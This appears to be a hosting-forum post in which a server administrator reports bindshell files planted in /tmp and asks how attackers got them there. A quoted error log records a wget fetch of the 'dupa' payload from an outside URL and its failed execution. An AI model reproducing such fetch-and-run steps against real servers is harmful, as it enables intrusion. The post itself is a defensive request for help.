sullise
Verified User
- Joined
- Mar 4, 2004
- Messages
- 475
Being plagued with bindshells lately in my /tmp directory.  Luckly I"m not stupid enough to allow anything to execute from /tmp, but it is a PITA to keep watching it anyway.  (I have scripts that check for them as I find new ones and kill em).
One that keeps popping up is called "dupa". I finally found WHERE it's originating from and added the IP to APF, but would like to know HOW they are getting it into /tmp to start with. Only reference I can find in ANY logs is in the /httpd/error_log:
A couple other hosts I work with are having simular issues last few days with nasty bindshell attacks as well. Only common factor is that they all attacks are on DA servers. Possible exploit in DA itself?
I can't find any reference to 'dupa', the IP, or anything related in any other log file, included all the client logs.
Any thoughts?
Other ones I've gotten of late are /tmp/.ssh and /tmp/.kurwa
Like I said, my /tmp is hardened and nothing can execute, but still, would like to find the hole.
Server is running uptodate services as far as I can tell.
				
			One that keeps popping up is called "dupa". I finally found WHERE it's originating from and added the IP to APF, but would like to know HOW they are getting it into /tmp to start with. Only reference I can find in ANY logs is in the /httpd/error_log:
--08:05:12-- http://members.lycos.co.uk/iksinski33/dupa
=> `dupa'
Resolving members.lycos.co.uk... 212.78.204.20
Connecting to members.lycos.co.uk|212.78.204.20|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32,391 (32K) [text/plain]
0K .......... .......... .......... . 100% 74.12 KB/s
08:05:13 (74.12 KB/s) - `dupa' saved [32391/32391]
sh: line 1: ./dupa: Permission denied
A couple other hosts I work with are having simular issues last few days with nasty bindshell attacks as well. Only common factor is that they all attacks are on DA servers. Possible exploit in DA itself?
I can't find any reference to 'dupa', the IP, or anything related in any other log file, included all the client logs.
Any thoughts?
Other ones I've gotten of late are /tmp/.ssh and /tmp/.kurwa
Like I said, my /tmp is hardened and nothing can execute, but still, would like to find the hole.
Server is running uptodate services as far as I can tell.
